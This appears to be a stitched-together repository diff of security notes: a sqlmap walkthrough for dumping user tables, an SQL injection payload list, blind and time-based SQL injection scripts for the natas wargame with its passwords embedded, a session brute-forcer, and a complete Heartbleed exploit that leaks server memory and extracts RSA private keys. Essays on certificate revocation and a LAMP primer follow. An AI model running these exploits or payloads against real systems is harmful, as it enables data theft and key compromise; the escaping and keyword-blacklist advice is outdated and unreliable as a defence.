[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:27] [WARNING] reflective value(s) found and filtering out
[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
(...)
```
#### Gaining access to the Database
* From this we can see which databases are available, and then find out how many tables exist, along with their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the passwords are in clear text (not hashed with MD5, etc.), we have access to the website.
## Basic SQL Injection Exploit Steps
1. Fingerprint database server.
2. Get an initial working exploit. Examples of payloads:
- '
- '--
- ')--
- '))--
- or '1'='1'
- or '1'='1
- 1--
3. Extract data through UNION statements:
- NULL: used as a column placeholder; it helps with data type conversion errors.
- GROUP BY: helps determine the number of columns.
4. Enumerate database schema.
5. Dump application data.
6. Escalate privilege and pwn the OS.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate input, such as:
- is_numeric()
- ctype_digit()
- settype()
- addslashes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escaping functions:
- mysql_real_escape_string()
- sqlite_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always parse and validate data received from the user (GET and POST parameters).
- The chars to be checked: ```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request. They can help fingerprint the RDBMS (MSSQL, MySQL, etc.).
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.


@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
print r.url
if KEYWORD in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option
SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
KEYWORD = 'exists'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))


@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
time = r.elapsed.total_seconds()
print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
#print r.url
if time >= 9:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option 1
SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))


@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)


@ -0,0 +1,37 @@
## [Nikto](http://sectools.org/tool/nikto/)
* Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
* Most scanned vulnerabilities are things such as XSS, phpmyadmin logins,
etc.
* It's coded in Perl.
* It is not a stealthy tool. It will test a web server in the quickest time possible, and it is obvious in log files.
* There is support for LibWhisker's anti-IDS methods.
* To fire it up in a website:
```
$ ./nikto.pl -h <IP> -p <PORT> -output <OUTPUT-FILE>
```
* The output file can be opened with *Niktorat*.
## [W3af](http://w3af.org/)
* w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.
* It's coded in Python.
* It has plugins that communicate with each other.
* It removes some of the headaches involved in manual web application testing through its Fuzzy and manual request generator feature.
* It can be configured to run as a MITM proxy. The intercepted requests can be sent to the request generator, and manual web application testing can then be performed using variable parameters.
* It also has features to exploit the vulnerabilities that it finds. w3af supports detection of both simple and blind OS commanding vulnerability.


@ -0,0 +1,454 @@
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
# -added option to have verbose output
# -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command
# -added option for hex output
# -added option to output raw data to a file
# -added option to output ascii data to a file
# -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
# -added tls version auto-detection
# -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
# -requires following modules: gmpy, pyasn1
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
import time
import os
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')
opts, args = options.parse_args()
if opts.extractkey:
import base64, gmpy
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
def hex2bin(arr):
return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
def build_client_hello(tls_ver):
client_hello = [
# TLS header ( 5 bytes)
0x16, # Content type (0x16 for handshake)
0x03, tls_ver, # TLS Version
0x00, 0xdc, # Length
# Handshake header
0x01, # Type (0x01 for ClientHello)
0x00, 0x00, 0xd8, # Length
0x03, tls_ver, # TLS Version
# Random (32 byte)
0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
0x00, # Session ID length
0x00, 0x66, # Cipher suites length
# Cipher suites (51 suites)
0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
0x01, # Compression methods length
0x00, # Compression method (0x00 for NULL)
0x00, 0x49, # Extensions length
# Extension: ec_point_formats
0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
# Extension: elliptic_curves
0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
# Extension: SessionTicket TLS
0x00, 0x23, 0x00, 0x00,
# Extension: Heartbeat
0x00, 0x0f, 0x00, 0x01, 0x01
]
return client_hello
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
if opts.rawoutfile:
rawfileOUT = open(opts.rawoutfile, "a")
if opts.asciioutfile:
asciifileOUT = open(opts.asciioutfile, "a")
if opts.extractkey:
opts.donotdisplay = True
def hexdump(s):
pdat = ''
hexd = ''
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
if opts.hexdump:
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
hexd += ' %04x: %-48s %s\n' % (b, hxdat, pdat)
else:
pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
if opts.hexdump:
return hexd
else:
pdat = re.sub(r'([.]{50,})', '', pdat)
if opts.asciioutfile:
asciifileOUT.write(pdat)
return pdat
def rcv_tls_record(s):
try:
tls_header = s.recv(5)
if not tls_header:
print 'Unexpected EOF (header)'
return None,None,None
typ,ver,length = struct.unpack('>BHH',tls_header)
message = ''
while len(message) != length:
message += s.recv(length-len(message))
if not message:
print 'Unexpected EOF (message)'
return None,None,None
if opts.verbose:
print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
return typ,ver,message
except Exception as e:
print "\nError Receiving Record! " + str(e)
return None,None,None
def hit_hb(s, targ, firstrun, supported):
s.send(hex2bin(build_heartbeat(supported)))
while True:
typ, ver, pay = rcv_tls_record(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return ''
if typ == 24:
if opts.verbose:
print 'Received heartbeat response...'
if len(pay) > 3:
if firstrun or opts.verbose:
print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
if opts.rawoutfile:
rawfileOUT.write(pay)
if opts.extractkey:
return pay
else:
return hexdump(pay)
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
if typ == 21:
print 'Received alert:'
return hexdump(pay)
print 'Server returned error, likely not vulnerable'
return ''
def conn(targ, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.settimeout(10)
#time.sleep(0.2)
s.connect((targ, port))
return s
except Exception as e:
print "Connection Error! " + str(e)
return None
def bleed(targ, port):
try:
res = ''
firstrun = True
print '\n##################################################################'
print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
for x in range(0, opts.num):
if x > 0:
firstrun = False
if x == 0 and opts.extractkey:
print "Attempting to extract private key from returned data..."
if not os.path.exists('./hb-certs'):
os.makedirs('./hb-certs')
print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')
print '\nExtracting modulus from cert...\n'
os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
modulus = output.read()
s = conn(targ, port)
if not s:
continue
# send starttls command if specified as an option or if common smtp/pop3/imap ports are used
if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
stls = False
atls = False
# check if smtp supports starttls/stls
if port in {25, 587}:
print 'SMTP Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
s.send("EHLO someone.org\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if pop3/imap supports starttls/stls
elif port in {110, 143}:
print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
if port == 110:
s.send("CAPA\n")
if port == 143:
s.send("CAPABILITY\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if ftp supports auth tls/starttls
elif port in {21}:
print 'FTP Port... Checking for AUTH TLS Capability...'
check = s.recv(1024)
s.send("FEAT\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "AUTH TLS" in check:
opts.starttls = True
atls = True
print "AUTH TLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# send appropriate tls command if supported
if opts.starttls:
sys.stdout.flush()
if stls:
print 'Sending STLS Command...'
s.send("STLS\n")
elif atls:
print 'Sending AUTH TLS Command...'
s.send("AUTH TLS\n")
else:
print 'Sending STARTTLS Command...'
s.send("STARTTLS\n")
if opts.verbose:
print 'Waiting for reply...'
sys.stdout.flush()
rcv_tls_record(s)
supported = False
for num,tlsver in tls_versions.items():
if firstrun:
print 'Sending Client Hello for {}'.format(tlsver)
s.send(hex2bin(build_client_hello(num)))
if opts.verbose:
print 'Waiting for Server Hello...'
while True:
typ,ver,message = rcv_tls_record(s)
if not typ:
if opts.verbose:
print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
s.close()
s = conn(targ, port)
break
if typ == 22 and ord(message[0]) == 0x0E:
if firstrun:
print 'Received Server Hello for {}'.format(tlsver)
supported = True
break
if supported: break
if not supported:
print '\nError! No TLS versions supported!'
print '##################################################################'
return
if opts.verbose:
print '\nSending heartbeat request...'
sys.stdout.flush()
keyfound = False
if opts.extractkey:
res = hit_hb(s, targ, firstrun, supported)
if res == '':
continue
keyfound = extractkey(targ, res, modulus)
else:
res += hit_hb(s, targ, firstrun, supported)
s.close()
if keyfound:
sys.exit(0)
else:
sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
sys.stdout.flush()
print '\n##################################################################'
print
return res
except Exception as e:
print "Error! " + str(e)
print '##################################################################'
print
def extractkey(host, chunk, modulus):
#print "\nChecking for private key...\n"
n = int (modulus, 16)
keysize = n.bit_length() / 16
for offset in xrange (0, len (chunk) - keysize):
p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
if gmpy.is_prime (p) and p != n and n % p == 0:
if opts.verbose:
print '\n\nFound prime: ' + str(p)
e = 65537
q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
privkeydump.write(chunk)
return True
else:
return False
def main():
print "\ndefribulator v1.16"
print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
allresults = ''
# if a file is specified, loop through file
if opts.filein:
fileIN = open(opts.filein, "r")
for line in fileIN:
targetinfo = line.strip().split(":")
if len(targetinfo) > 1:
allresults = bleed(targetinfo[0], int(targetinfo[1]))
else:
allresults = bleed(targetinfo[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
fileIN.close()
else:
if len(args) < 1:
options.print_help()
return
allresults = bleed(args[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
print
if opts.rawoutfile:
rawfileOUT.close()
if opts.asciioutfile:
asciifileOUT.close()
if __name__ == '__main__':
main()


@ -0,0 +1,123 @@
# On CRLs, OCSP, and a Short Review of Why Revocation Checking Doesn't Work (for Browsers)
A guide to how revocation is handled for **SSL/TLS connections**. These connections rely on a chain of trust, which is established by **certificate authorities** (CAs); they serve as trust anchors to verify the validity of who a device thinks it is talking to. In technical terms, **X.509** is an [ITU-T](http://en.wikipedia.org/wiki/ITU-T) standard that specifies standard formats for things such as *public key certificates* and *certificate revocation lists*.
A **public key certificate** is how websites bind their identity to a *public key* to allow an encrypted session (SSL/TLS) with the user. The certificate includes information about the key, the owner's *identity* (such as the DNS name), and the *digital signature* of the entity that issued the certificate (the [Certificate Authority](http://en.wikipedia.org/wiki/Certificate_authority), also known as CA). As a consequence, browsers and other [user-agents](http://en.wikipedia.org/wiki/User_agent) should always be able to check the authenticity of these certificates before proceeding.
Some organizations need SSL/TLS simply for confidentiality (encryption), while other organizations use it to enhance trust in their security and identity. Therefore, CAs issue different certificates with different levels of verification, ranging from just confirming control of the domain name (*Domain Validation*, DV) to more extensive identity checks (*Extended Validation*, EV). For instance, if a site's DNS gets hijacked, the attacker might be able to obtain a DV certificate for it, but she wouldn't be able to issue new EV certificates with domain validation alone.
Since EV and DV certificates can be valid for years, they might lose their validity before they expire by age. For instance, the website can lose control of its key or, as recently in the event of the [Heartbleed bug](http://heartbleed.com/), a very large number of SSL/TLS websites needed to revoke and reissue their certificates. Therefore, the need for efficient revocation machinery is evident.
For many years, two ways of revoking a certificate have prevailed:
* by checking **Certificate Revocation Lists** (CRLs), which are lists of serial numbers of certificates that have been revoked, provided by *each CA*. As one can imagine, they can become quite large.
* by a communication protocol named **Online Certificate Status Protocol** (OCSP), which allows a system to check with a CA for the status of a single certificate without pulling the entire CRL.
While CRLs are long lists and OCSP only deals with a single certificate, they are both methods of getting signed statements about the status of a certificate; and they both present issues concerning privacy, integrity, and availability. In this post, I discuss some of these issues and I review possible alternatives.
----
## Broken Models
### Certificate Revocation Lists (CRLs)
A CRL is a list of serial numbers (such as ```54:99:05:bd:ca:2a:ad:e3:82:21:95:d6:aa:ee:b6:5a```) of unexpired security certificates which have been revoked by their issuer and should not be trusted.
Each CA maintains and publishes its own CRL. CRLs change continuously: old certificates drop off as they expire due to their age, and serial numbers of newly revoked certificates are added.
The main issue here is that the original *public key infrastructure* (PKI) scheme does not scale. Users all over the Internet are constantly checking for revocation and having to download files that can be many megabytes in size. In addition, although CRLs can be cached, they are still very volatile, turning CAs into a major performance bottleneck on the Internet.
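As a rough sketch of what a client-side CRL check involves, the snippet below downloads a CRL and looks for one serial number in it (assuming pyOpenSSL is installed; the CRL URL and the serial number are placeholders, not real values):

```python
import urllib2
from OpenSSL import crypto

CRL_URL = 'http://crl.example-ca.com/ca.crl'     # hypothetical CA CRL endpoint
SERIAL = 0x549905bdca2aade3822195d6aaeeb65a      # serial number we want to check

der_data = urllib2.urlopen(CRL_URL).read()       # this download can be many megabytes
crl = crypto.load_crl(crypto.FILETYPE_ASN1, der_data)

revoked = [int(r.get_serial(), 16) for r in (crl.get_revoked() or ())]
if SERIAL in revoked:
    print 'Certificate is revoked, do not trust it!'
else:
    print 'Serial not found in this CRL.'
```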
### Online Certificate Status Protocol (OCSP)
[OCSP was intended to replace the CRL system](https://tools.ietf.org/html/rfc2560), however, it presented several issues:
* *Reliability*: Every time any user connects to any secured website, her browser must query the CA's OCSP server. The typical CA issues certificates for hundreds of thousands of individual websites and the checks can take up to several seconds. Also, the CA's OCSP server might experience downtime! If a server is offline, overloaded, under attack, or unable to reply for any reason, certificate validity cannot be confirmed.
* *Privacy*: CAs can learn the IP address of users and which websites they wish to securely visit.
* *Security*: Browsers cannot be sure that a CA's server is reachable (*e.g.*, captive portals that require one to sign in on an HTTPS site, but block traffic to all other sites, including the CA's OCSP servers).
One attempt to work around unreliable OCSP servers was to make OCSP checks **soft-fail**: online revocation checks that result in a *network error are simply ignored*.
This brings serious issues. A simple example is when an [attacker can intercept HTTPS traffic and make online revocation checks appear to fail, bypassing OCSP checks](http://www.thoughtcrime.org/papers/ocsp-attack.pdf).
On the flip side, it's also not a good idea to enforce a **hard-fail** check: OCSP servers are pretty flaky and slow, and you do not want every TLS connection on the web to depend on their availability (DDoS attackers would love that, though).
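The trade-off can be summarized in a small hedged sketch that shells out to the ```openssl ocsp``` command (the certificate files and the responder URL below are placeholder assumptions):

```python
import subprocess

def ocsp_check(cert='site.pem', issuer='issuer.pem',
               url='http://ocsp.example-ca.com', hard_fail=False):
    cmd = ['openssl', 'ocsp', '-issuer', issuer, '-cert', cert,
           '-url', url, '-noverify']
    try:
        out = subprocess.check_output(cmd)
    except (subprocess.CalledProcessError, OSError):
        # the responder is unreachable or returned an error
        if hard_fail:
            return False     # hard-fail: refuse the connection
        return True          # soft-fail: silently ignore the failure (risky!)
    return 'good' in out.lower() and 'revoked' not in out.lower()
```

With ```hard_fail=False```, an attacker who can block the OCSP traffic gets a free pass, which is exactly the problem described above.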
----
## Some Light in a Solution
There have been several attempts at solving the revocation problem, but none has been regarded as definitive. Here are some of them:
### CRLSets
Google Chrome uses [**CRLSets**](https://dev.chromium.org/Home/chromium-security/crlsets) in its update mechanism to send lists of serial numbers of revoked certificates, which Google gathers by continuously crawling the CAs' published CRLs.
This method brings more performance and reliability to the browser and, in addition, [CRLSet updates occur at least daily](https://www.imperialviolet.org/2014/04/19/revchecking.html), which is faster than most OCSP validity periods.
A complementary initiative from Google is the [Certificate Transparency](http://www.certificate-transparency.org/what-is-ct) project. The objective is to help with structural flaws in the SSL certificate system such as domain validation, end-to-end encryption, and the chains of trust set up by CAs.
### OCSP stapling
**OCSP Stapling** ([TLS Certificate Status Request extension](http://tools.ietf.org/html/draft-hallambaker-tlssecuritypolicy-03)) is an alternative approach for checking the revocation status of certificates. It allows the presenter of a certificate to bear the resource cost involved in providing OCSP responses, instead of the CA, in a fashion reminiscent of the [Kerberos Ticket](http://en.wikipedia.org/wiki/Kerberos_(protocol)).
In a simple example, the certificate holder is the one who periodically queries the OCSP server, obtaining a *signed, time-stamped OCSP response*. When users attempt to connect to the website, the stapled response is sent along with the SSL/TLS handshake via the Certificate Status Request extension. Since the stapled response is signed by the CA, it cannot be forged (without the CA's signing key).
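A quick way to see whether a given server staples OCSP responses is ```openssl s_client -connect host:443 -status```; here is a minimal wrapper sketch (the host is only an example):

```python
import subprocess

def has_stapled_ocsp(host):
    cmd = ['openssl', 's_client', '-connect', '%s:443' % host, '-status']
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, _ = proc.communicate(input='')   # close stdin so s_client exits
    # openssl prints "OCSP Response Status: successful" when a staple is present
    return 'OCSP Response Status: successful' in out

print has_stapled_ocsp('www.cloudflare.com')
```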
If the certificate carries the [Must Staple](http://tools.ietf.org/html/draft-hallambaker-muststaple-00) capability, the connection becomes hard-fail when a valid OCSP response is not stapled. To make a browser aware of this option, one can add a "must staple" assertion to the site's security certificate and/or create a new HTTP response header similar to [HSTS](http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security).
One fixable issue is that OCSP stapling supports only one response at a time. This is insufficient for sites that use several different certificates for a single page. Nevertheless, OCSP stapling is the most promising solution to the problem for now. The idea has been implemented by servers for years and, recently, a [few browsers have been adopting it](https://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox/). Only time will tell whether this solution becomes mainstream.
-----
**tl;dr:** The security of the Internet depends on the agents' ability to revoke compromised certificates, but the status quo is broken. There is an urgent need to rethink the way things have been done!
-----
**Edited, 11/19/2014:** The **EFF** just announced an attempt to help with the CA problem: [Let's Encrypt](https://www.eff.org/deeplinks/2014/11/certificate-authority-encrypt-entire-web), "a new certificate authority (CA) initiative that aims to clear the remaining roadblocks to transition the Web from HTTP to HTTPS". The initiative is planned to launch in 2015. This is good news, but it is still not clear whether they are going to address the revocation problem with new solutions.
----
### References:
[Imperial Violet: Revocation Doesn't work](https://www.imperialviolet.org/2011/03/18/revocation.html)
[Imperial Violet: Don't Enable Revocation Checking](https://www.imperialviolet.org/2014/04/19/revchecking.html)
[Imperial Violet: Revocation Still Doesn't Work](https://www.imperialviolet.org/2014/04/29/revocationagain.html)
[Proxy server for testing revocation](https://gist.github.com/agl/876829)
[Revocation checking and Chrome's CRL](https://www.imperialviolet.org/2012/02/05/crlsets.html)
[Discussion about OCSP checking at Chrome](https://code.google.com/p/chromium/issues/detail?id=361820)
[RFC Transport Layer Security (TLS) Channel IDs](http://tools.ietf.org/html/draft-balfanz-tls-channelid-00)
[Fixing Revocation for Web Browsers, iSEC Partners](https://www.isecpartners.com/media/17919/revocation-whitepaper_pdf__2_.pdf)
[Proposal for Better Revocation Model of SSL Certificates](https://wiki.mozilla.org/images/e/e3/SSLcertRevocation.pdf)
[SSL Server Test](https://www.ssllabs.com/ssltest/)
[SSL Certificate Checker](https://www.digicert.com/help/)

View file

@ -0,0 +1,260 @@
# Getting started with LAMP and CodeIgniter
LAMP is an acronym for a model of web service solution stacks: Linux, the Apache HTTP Server, the MySQL relational database management system, and the PHP programming language.
## Building a MySQL Database
We will use a web interface to access data in our database:
* Log in with your root username/password (set during the installation above): ```http://localhost/phpmyadmin```.
The left-hand column contains a list of all of the databases you currently have.
- mysql: contains information about the MySQL database server.
- information_schema: contains information about all of the other databases on your computer.
* In the Databases interface you are presented with a list of all of the databases.
* Above that list there should be a form labeled “Create new database” with a text field.
* Create tables within. Choose the types of your data. Every table should always have an id column (an auto-incrementing integer, meaning that each new record will be automatically assigned an id value, starting at 1). You can do this by selecting the A_I checkbox.
* Add some data (using insert). The database is located at
```/var/lib/mysql```.
### MySQL Query Basics
Selecting items:
```
-- Retrieve all of the records (* means all columns):
SELECT * FROM table_name;

-- Select only some columns:
SELECT col1, col2 FROM table_name;

-- Select only the rows where a column has a given value:
SELECT * FROM table_name WHERE col1 = 'item';

-- Select the first 10 items:
SELECT * FROM cars WHERE make = 'Porsche' LIMIT 10;
```
Inserting an item:
```
INSERT INTO table_name (col1, col2, col3) VALUES ('item1', 'item2', 'item3');
```
Updating an item:
```
UPDATE table_name SET col1 = 'item' WHERE col2 = 'item2' AND col3 = 'item3';
```
Deleting items:
```
DELETE FROM table_name WHERE col1 = 'item';
```
## PHP Basics
